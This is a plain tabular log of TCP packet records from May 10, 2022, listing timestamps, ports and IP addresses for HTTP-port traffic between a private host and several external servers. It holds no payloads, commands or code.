May 10, 2022 14:26:27.114376068 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.114540100 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114554882 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.114617109 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114650965 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114681959 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114711046 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114804983 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.114876032 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114907980 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.114988089 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.115088940 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.115120888 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.115151882 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.115164995 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.115220070 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.115250111 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.115391970 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.115521908 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.115629911 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.115663052 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.115693092 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.115786076 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.116044044 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.116229057 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.230772018 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.230842113 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.230874062 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.231048107 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.231070042 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.231183052 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.231348038 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.231365919 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.231405973 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.231544971 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.231578112 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.231611967 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.231642008 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.231720924 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.231808901 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.231841087 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.231897116 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.231956005 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232073069 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.232115030 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232146978 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232177019 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232208967 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232239008 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232274055 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232454062 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232585907 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232618093 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232700109 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232731104 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232815027 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232846022 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.232928991 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.233058929 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.233189106 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.233364105 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.233432055 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.233695984 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.233823061 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.233854055 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.234070063 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.234101057 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.234188080 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.234437943 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.234620094 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.234653950 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.234884977 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.234935045 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.234965086 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.347872972 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.347938061 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.347971916 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.348001003 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.348263979 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.348308086 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.348366022 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.348396063 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.348537922 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.348645926 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.349214077 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.349280119 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.349313021 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.349342108 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.349370003 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.349399090 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.349428892 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.376398087 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.376508951 CEST	80	49771	198.23.49.173	192.168.11.20
May 10, 2022 14:26:27.376616955 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:27.376671076 CEST	49771	80	192.168.11.20	198.23.49.173
May 10, 2022 14:26:47.133835077 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.297791004 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.298158884 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.299779892 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.463752985 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.463860989 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.463931084 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.463972092 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.464010954 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.464056015 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.464075089 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.464116096 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.464184046 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.464391947 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.464581966 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.628089905 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.628134012 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.628319025 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.628434896 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.628606081 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.628644943 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.628797054 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.628953934 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.628978014 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.629030943 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.629215956 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.629221916 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.629364014 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.629395962 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.629750967 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.630039930 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.630371094 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.631103039 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.631300926 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.631397009 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.631483078 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.631653070 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.631967068 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.632257938 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.632661104 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.632878065 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.633116007 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.633383036 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.792511940 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.792571068 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.792881966 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.792958975 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.793045044 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.793179989 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.793344021 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.793462992 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.793507099 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.793939114 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.793984890 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.794172049 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.794341087 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.794527054 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.794894934 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.794934988 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.795033932 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.795064926 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.795159101 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.795197010 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.795249939 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.795357943 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.795397043 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.795659065 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.795792103 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.795829058 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.795849085 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.796063900 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.796192884 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.796231031 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.796246052 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.796375990 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.796421051 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.796516895 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.796624899 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.796775103 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.796952009 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.797180891 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.797281027 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.797332048 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.797508001 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.797687054 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.956924915 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.956969976 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.957154036 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.957285881 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.957365990 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.957407951 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.957521915 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.957660913 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.957669020 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.957823992 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.957845926 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.958013058 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.958193064 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.958291054 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.958323002 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.958367109 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:47.958431959 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.958463907 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.958641052 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.958673954 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.959182978 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.959245920 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.959278107 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.959497929 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.959636927 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.959667921 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.959876060 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.959907055 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.960117102 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.960294008 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.960328102 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.960656881 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.960690975 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.960897923 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.960969925 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.961170912 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.961421967 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.961657047 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.962199926 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.962452888 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.962565899 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.962752104 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.963016987 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.963175058 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.963465929 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.963634968 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.963731050 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.963892937 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.964165926 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.964576006 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:47.965142012 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:48.121210098 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:48.121272087 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:48.121742010 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:48.121830940 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:48.121874094 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:48.122257948 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:48.122323990 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:48.122724056 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:48.269566059 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:48.269629002 CEST	80	49772	199.192.29.215	192.168.11.20
May 10, 2022 14:26:48.269782066 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:26:48.269844055 CEST	49772	80	192.168.11.20	199.192.29.215
May 10, 2022 14:27:06.129853010 CEST	49773	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:06.293277979 CEST	80	49773	68.65.122.211	192.168.11.20
May 10, 2022 14:27:06.293524981 CEST	49773	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:06.293628931 CEST	49773	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:06.458909035 CEST	80	49773	68.65.122.211	192.168.11.20
May 10, 2022 14:27:06.458960056 CEST	80	49773	68.65.122.211	192.168.11.20
May 10, 2022 14:27:06.459194899 CEST	49773	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:06.459239960 CEST	49773	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:06.622616053 CEST	80	49773	68.65.122.211	192.168.11.20
May 10, 2022 14:27:08.469999075 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:08.633691072 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:08.634059906 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:08.635654926 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:08.635790110 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:08.800905943 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:08.800955057 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:08.801256895 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:08.801398993 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:08.966128111 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:08.966176987 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:08.966358900 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:08.966507912 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:08.966543913 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:08.966723919 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:08.966799974 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:08.966903925 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:08.967084885 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:09.131846905 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:09.131910086 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:09.132085085 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:09.132198095 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:09.133040905 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:09.133198977 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:09.133228064 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:09.133285999 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:09.133327961 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:09.133405924 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:09.133598089 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:09.133774996 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:09.133970022 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:09.134244919 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:09.134424925 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:09.134665012 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:09.134713888 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:09.134797096 CEST	49774	80	192.168.11.20	68.65.122.211
May 10, 2022 14:27:09.301192045 CEST	80	49774	68.65.122.211	192.168.11.20
May 10, 2022 14:27:25.121239901 CEST	49781	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:25.128921032 CEST	80	49781	185.53.179.171	192.168.11.20
May 10, 2022 14:27:25.129076958 CEST	49781	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:25.136902094 CEST	80	49781	185.53.179.171	192.168.11.20
May 10, 2022 14:27:25.137101889 CEST	49781	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:25.144807100 CEST	80	49781	185.53.179.171	192.168.11.20
May 10, 2022 14:27:25.144925117 CEST	80	49781	185.53.179.171	192.168.11.20
May 10, 2022 14:27:25.144936085 CEST	80	49781	185.53.179.171	192.168.11.20
May 10, 2022 14:27:25.145188093 CEST	49781	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:25.145198107 CEST	49781	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:25.152895927 CEST	80	49781	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.154007912 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.162199974 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.162415981 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.170670033 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.170840979 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.170872927 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.170919895 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.171097040 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.178874969 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.178930998 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.178947926 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.179091930 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.179116964 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.179157972 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.179173946 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.179191113 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.179208040 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.179269075 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.179419041 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.179589987 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.187176943 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.187228918 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.187360048 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.187383890 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.187459946 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.187552929 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.187577009 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.187611103 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.187634945 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.187731028 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.187735081 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.187760115 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.187845945 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.187911034 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.187984943 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.188013077 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.188036919 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.188093901 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.188267946 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.188437939 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.195897102 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.195945024 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.196053028 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.196086884 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.196151972 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.196227074 CEST	49782	80	192.168.11.20	185.53.179.171
May 10, 2022 14:27:27.196295023 CEST	80	49782	185.53.179.171	192.168.11.20
May 10, 2022 14:27:27.196424007 CEST	80	49782	185.53.179.171	192.168.11.20
